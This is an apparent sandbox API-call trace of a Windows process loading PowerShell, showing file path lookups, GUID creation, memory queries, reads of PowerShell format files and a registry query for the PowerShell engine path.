	[0477.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0478.541] VirtualQuery (in: lpAddress=0x22bfe0, lpBuffer=0x22cea0, dwLength=0x30 | out: lpBuffer=0x22cea0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0478.542] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc8a6d302, Data2=0xfed6, Data3=0x4712, Data4=([0]=0x97, [1]=0x95, [2]=0xaa, [3]=0x4b, [4]=0xb5, [5]=0xbe, [6]=0x4b, [7]=0x13))) returned 0x0
	[0478.543] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xb9967e4d, Data2=0x7b79, Data3=0x4a37, Data4=([0]=0xa7, [1]=0x8d, [2]=0xff, [3]=0x54, [4]=0x8d, [5]=0xfa, [6]=0x29, [7]=0x7))) returned 0x0
	[0478.544] VirtualQuery (in: lpAddress=0x22c190, lpBuffer=0x22d050, dwLength=0x30 | out: lpBuffer=0x22d050*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0478.545] VirtualQuery (in: lpAddress=0x22c190, lpBuffer=0x22d050, dwLength=0x30 | out: lpBuffer=0x22d050*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0478.546] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xd1ccab5a, Data2=0x79ed, Data3=0x464b, Data4=([0]=0x99, [1]=0x8e, [2]=0x2c, [3]=0x3a, [4]=0x6c, [5]=0x9b, [6]=0xb1, [7]=0x6))) returned 0x0
	[0478.549] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xffe1d913, Data2=0xb01a, Data3=0x4992, Data4=([0]=0xa6, [1]=0xde, [2]=0xaf, [3]=0xbc, [4]=0x9f, [5]=0x22, [6]=0x24, [7]=0x84))) returned 0x0
	[0478.549] VirtualQuery (in: lpAddress=0x22c3e0, lpBuffer=0x22d2a0, dwLength=0x30 | out: lpBuffer=0x22d2a0*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0478.550] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4e8de365, Data2=0x948b, Data3=0x43e6, Data4=([0]=0x85, [1]=0xcb, [2]=0xd4, [3]=0x20, [4]=0xf6, [5]=0xac, [6]=0x72, [7]=0x85))) returned 0x0
	[0478.551] VirtualQuery (in: lpAddress=0x22ba50, lpBuffer=0x22c910, dwLength=0x30 | out: lpBuffer=0x22c910*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0478.551] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x526d7d80, Data2=0xcfbd, Data3=0x4426, Data4=([0]=0x95, [1]=0xae, [2]=0x3a, [3]=0x48, [4]=0x9c, [5]=0x5c, [6]=0xe, [7]=0x53))) returned 0x0
	[0478.551] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xebd36448, Data2=0x8d95, Data3=0x469b, Data4=([0]=0xa8, [1]=0xea, [2]=0xe4, [3]=0xe0, [4]=0x23, [5]=0x47, [6]=0xab, [7]=0xae))) returned 0x0
	[0479.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0479.626] SetErrorMode (uMode=0x1) returned 0x1
	[0479.626] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0479.627] GetFileType (hFile=0x330) returned 0x1
	[0479.627] SetErrorMode (uMode=0x1) returned 0x1
	[0479.627] GetFileType (hFile=0x330) returned 0x1
	[0479.627] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.627] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.627] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.627] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.628] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.628] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.628] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.628] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.629] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.629] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.629] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.629] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.630] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.630] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.630] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.630] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.631] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0479.632] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0xbce, lpOverlapped=0x0) returned 1
	[0479.632] ReadFile (in: hFile=0x330, lpBuffer=0x2bfd3e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfd3e6*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0479.632] ReadFile (in: hFile=0x330, lpBuffer=0x2bfdcb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2bfdcb0*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0479.632] CloseHandle (hObject=0x330) returned 1
	[0479.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0479.632] SetErrorMode (uMode=0x1) returned 0x1
	[0479.633] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0479.633] SetErrorMode (uMode=0x1) returned 0x1
	[0479.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0479.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x330) returned 0x0
	[0479.633] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0479.633] CoTaskMemAlloc (cb=0x5a) returned 0x43be30
	[0479.633] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x43be30, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0479.633] CoTaskMemFree (pv=0x43be30) 
	[0479.633] RegCloseKey (hKey=0x330) returned 0x0
	[0479.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0479.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0479.635] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x2807bd0a, Data2=0xb6ec, Data3=0x4941, Data4=([0]=0x9f, [1]=0xe2, [2]=0x8e, [3]=0xec, [4]=0x16, [5]=0x24, [6]=0x4f, [7]=0xe))) returned 0x0
	[0479.635] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xcec85fb2, Data2=0x5d50, Data3=0x45ba, Data4=([0]=0x91, [1]=0xc6, [2]=0xcb, [3]=0x7e, [4]=0xf9, [5]=0x30, [6]=0xf9, [7]=0x7a))) returned 0x0
	[0479.636] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x7589271b, Data2=0xbbd1, Data3=0x4bac, Data4=([0]=0xbe, [1]=0x2b, [2]=0x47, [3]=0x75, [4]=0xe8, [5]=0x7b, [6]=0x87, [7]=0x74))) returned 0x0
	[0479.637] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x47a0c996, Data2=0xca62, Data3=0x43b4, Data4=([0]=0xaa, [1]=0x63, [2]=0xde, [3]=0x94, [4]=0x48, [5]=0x43, [6]=0x84, [7]=0x8a))) returned 0x0
	[0479.637] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x90d6fdc4, Data2=0x7eb9, Data3=0x4f19, Data4=([0]=0xaf, [1]=0xe9, [2]=0x75, [3]=0xc4, [4]=0x3, [5]=0x4a, [6]=0xda, [7]=0xaa))) returned 0x0
	[0479.638] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3a111a91, Data2=0x2935, Data3=0x4795, Data4=([0]=0xb7, [1]=0x95, [2]=0xdd, [3]=0x4a, [4]=0x21, [5]=0xdd, [6]=0xba, [7]=0x10))) returned 0x0
	[0479.638] VirtualQuery (in: lpAddress=0x22c120, lpBuffer=0x22cfe0, dwLength=0x30 | out: lpBuffer=0x22cfe0*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0479.639] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3f91e059, Data2=0xb047, Data3=0x4fa1, Data4=([0]=0xa6, [1]=0x84, [2]=0xcd, [3]=0xa7, [4]=0xd4, [5]=0x21, [6]=0xbc, [7]=0x19))) returned 0x0
	[0479.639] VirtualQuery (in: lpAddress=0x22c120, lpBuffer=0x22cfe0, dwLength=0x30 | out: lpBuffer=0x22cfe0*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0479.640] VirtualQuery (in: lpAddress=0x22c120, lpBuffer=0x22cfe0, dwLength=0x30 | out: lpBuffer=0x22cfe0*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0479.641] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x2cf50370, Data2=0x5ec4, Data3=0x4393, Data4=([0]=0x9d, [1]=0x5f, [2]=0x1d, [3]=0x83, [4]=0xf7, [5]=0x27, [6]=0x59, [7]=0x58))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x50a15024, Data2=0xf956, Data3=0x4ad8, Data4=([0]=0x9b, [1]=0xca, [2]=0x39, [3]=0xe0, [4]=0x68, [5]=0xe9, [6]=0xae, [7]=0x4e))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x293df409, Data2=0x6f1e, Data3=0x4771, Data4=([0]=0x8c, [1]=0x62, [2]=0xbe, [3]=0x65, [4]=0xcb, [5]=0xaa, [6]=0xc5, [7]=0x38))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3b3d180f, Data2=0xc35e, Data3=0x4612, Data4=([0]=0x9e, [1]=0x9b, [2]=0x69, [3]=0x62, [4]=0x9, [5]=0x92, [6]=0x57, [7]=0xa))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x16a8c24d, Data2=0x1ffd, Data3=0x400d, Data4=([0]=0xa9, [1]=0xf4, [2]=0x9b, [3]=0x55, [4]=0xad, [5]=0xbb, [6]=0xfb, [7]=0xf))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4af26fdc, Data2=0x8fa7, Data3=0x4e82, Data4=([0]=0xb8, [1]=0xaf, [2]=0x4d, [3]=0x97, [4]=0xf7, [5]=0x74, [6]=0xff, [7]=0xf))) returned 0x0
	[0479.642] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xd8794c90, Data2=0x7271, Data3=0x4252, Data4=([0]=0xaa, [1]=0x2a, [2]=0x84, [3]=0x97, [4]=0xdc, [5]=0xe8, [6]=0x4, [7]=0xca))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x244e936a, Data2=0x5936, Data3=0x4a74, Data4=([0]=0xa3, [1]=0x1d, [2]=0x1f, [3]=0x38, [4]=0x4c, [5]=0x79, [6]=0x35, [7]=0x32))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xce3dd85e, Data2=0x71c8, Data3=0x48b5, Data4=([0]=0x80, [1]=0x92, [2]=0x6e, [3]=0x14, [4]=0x7f, [5]=0x78, [6]=0x7f, [7]=0x56))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xc5ac0a56, Data2=0x47b4, Data3=0x4977, Data4=([0]=0xb9, [1]=0xe4, [2]=0x61, [3]=0xe1, [4]=0xdd, [5]=0x56, [6]=0x47, [7]=0x80))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x42d874b, Data2=0xa80a, Data3=0x4de0, Data4=([0]=0xb4, [1]=0xe4, [2]=0x9a, [3]=0xf, [4]=0x5b, [5]=0x5, [6]=0x55, [7]=0x38))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x76f23e61, Data2=0x2df5, Data3=0x4d07, Data4=([0]=0xa8, [1]=0xf2, [2]=0x18, [3]=0xfb, [4]=0xd9, [5]=0xb, [6]=0x51, [7]=0x9e))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xf6f7e993, Data2=0xc509, Data3=0x4a42, Data4=([0]=0x96, [1]=0xd7, [2]=0x10, [3]=0x26, [4]=0xdc, [5]=0xee, [6]=0xe7, [7]=0xeb))) returned 0x0
	[0479.643] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xcca34e85, Data2=0x185a, Data3=0x482b, Data4=([0]=0xb7, [1]=0x97, [2]=0x65, [3]=0x80, [4]=0x17, [5]=0x8, [6]=0x4c, [7]=0x99))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xa0f84bc4, Data2=0xfa63, Data3=0x46f3, Data4=([0]=0xb8, [1]=0x12, [2]=0xd2, [3]=0xab, [4]=0xd9, [5]=0x7b, [6]=0x97, [7]=0x98))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xf7008b85, Data2=0xd0ef, Data3=0x488a, Data4=([0]=0xb7, [1]=0x1a, [2]=0x25, [3]=0x32, [4]=0x32, [5]=0xfc, [6]=0x29, [7]=0x15))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xcb75bf13, Data2=0xb935, Data3=0x4340, Data4=([0]=0x9e, [1]=0xfd, [2]=0x15, [3]=0xfe, [4]=0x5, [5]=0x1b, [6]=0x51, [7]=0x7d))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x3297cfc9, Data2=0x37ca, Data3=0x4a55, Data4=([0]=0x96, [1]=0x38, [2]=0x7, [3]=0xaf, [4]=0xc0, [5]=0xa2, [6]=0x8, [7]=0x53))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x7d612a, Data2=0xb1d5, Data3=0x4362, Data4=([0]=0x80, [1]=0x55, [2]=0xd, [3]=0x3, [4]=0xe3, [5]=0xde, [6]=0xcf, [7]=0xfc))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x8de093be, Data2=0xb89d, Data3=0x417a, Data4=([0]=0x84, [1]=0x47, [2]=0x17, [3]=0xc6, [4]=0x97, [5]=0xc2, [6]=0x84, [7]=0x67))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x2da3b8ad, Data2=0x202e, Data3=0x412f, Data4=([0]=0x96, [1]=0xf0, [2]=0x81, [3]=0x6a, [4]=0xa, [5]=0xfd, [6]=0xde, [7]=0x13))) returned 0x0
	[0479.644] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xfc993e01, Data2=0xa136, Data3=0x466a, Data4=([0]=0xbd, [1]=0x87, [2]=0x6a, [3]=0x24, [4]=0x20, [5]=0xae, [6]=0x34, [7]=0x23))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x764f6731, Data2=0xf24f, Data3=0x4584, Data4=([0]=0xa4, [1]=0xa5, [2]=0xc1, [3]=0xe8, [4]=0x1d, [5]=0xf, [6]=0xad, [7]=0x65))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x9fd431ac, Data2=0x6985, Data3=0x48af, Data4=([0]=0x8f, [1]=0xce, [2]=0x95, [3]=0x23, [4]=0x8e, [5]=0x5d, [6]=0x1a, [7]=0x88))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x88f524b5, Data2=0x66aa, Data3=0x4ca6, Data4=([0]=0xb0, [1]=0x59, [2]=0x31, [3]=0xda, [4]=0xd4, [5]=0xa4, [6]=0xa1, [7]=0x9d))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xf8d8c810, Data2=0x8e36, Data3=0x4df1, Data4=([0]=0xba, [1]=0x5a, [2]=0x3b, [3]=0xf5, [4]=0xd6, [5]=0xd8, [6]=0x2a, [7]=0xe1))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xca41b642, Data2=0x8301, Data3=0x4575, Data4=([0]=0x9b, [1]=0x20, [2]=0x47, [3]=0xd0, [4]=0x43, [5]=0x7e, [6]=0x90, [7]=0x5c))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x6bbb477f, Data2=0xd1ed, Data3=0x49dd, Data4=([0]=0xa7, [1]=0xed, [2]=0xb3, [3]=0xca, [4]=0xda, [5]=0x17, [6]=0x94, [7]=0x68))) returned 0x0
	[0479.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x8db4e393, Data2=0xc1db, Data3=0x434c, Data4=([0]=0xa6, [1]=0xce, [2]=0x40, [3]=0xac, [4]=0x83, [5]=0xdf, [6]=0x4c, [7]=0xc0))) returned 0x0
	[0479.646] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x438a1bf4, Data2=0xfebe, Data3=0x40bd, Data4=([0]=0x89, [1]=0xb3, [2]=0xf8, [3]=0xe, [4]=0x84, [5]=0xa7, [6]=0xba, [7]=0x36))) returned 0x0
	[0479.646] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0479.646] GetFileType (hFile=0x330) returned 0x1
	[0479.646] SetErrorMode (uMode=0x1) returned 0x1
	[0479.646] GetFileType (hFile=0x330) returned 0x1
